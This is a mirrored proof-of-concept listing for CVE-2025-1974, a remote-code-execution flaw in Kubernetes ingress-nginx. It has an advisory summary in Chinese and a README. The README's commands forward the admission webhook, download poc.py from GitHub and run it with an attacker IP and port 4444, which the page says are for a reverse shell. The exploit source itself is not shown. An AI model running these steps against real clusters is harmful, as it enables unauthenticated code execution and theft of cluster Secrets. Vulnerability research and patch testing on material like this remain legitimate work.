CVE-2025-1974 PoC — Kubernetes ingress-nginx 安全漏洞

Source

https://github.com/hi-unc1e/CVE-2025-1974-poc

Associated Vulnerability

Title:Kubernetes ingress-nginx 安全漏洞 (CVE-2025-1974)
Description:Kubernetes ingress-nginx是云原生计算基金会（Cloud Native Computing Foundation）开源的Kubernetes 的入口控制器，使用NGINX作为反向代理和负载均衡器。 Kubernetes ingress-nginx存在安全漏洞，该漏洞源于在某些条件下，未认证的攻击者可通过访问pod网络在ingress-nginx控制器环境中执行任意代码，可能导致Secrets泄露。

Description

PoC of CVE-2025-1974, modified from the world-first PoC~

Readme

# POC of IngressNightmare, RCE in Ingress NGINX (CVE-2025-1974)


> Developed from:
- https://github.com/zwxxb/CVE-2025-1974/blob/main/poc.py
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities#how-did-we-discover-ingressnightmare-24

Thanks


# 使用说明
```python
# forward the admission webhook
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller 8080:80 &
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 9443:443 &


# python3 -m pip install -r requirements.txt
python3 -m pip install httpx asyncio
wget -c https://github.com/hi-unc1e/CVE-2025-1974-poc/raw/refs/heads/master/poc.py
python3 poc.py --local --ip 192.168.49.1 --port 4444  --admission-port 9443
```


参数说明：
- `ip`、`port`，反弹 shell 用
- `admission-port`，默认是 8443

执行效果：

![image](image.png)

File Snapshot


 [4.0K]  /data/pocs/27c8ddea34d27b7b24ee8e78d739961bc1e9b87a
├── [489K]  image.png
├── [ 11K]  poc.py
├── [ 856]  README.md
└── [  14]  requirements.txt

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!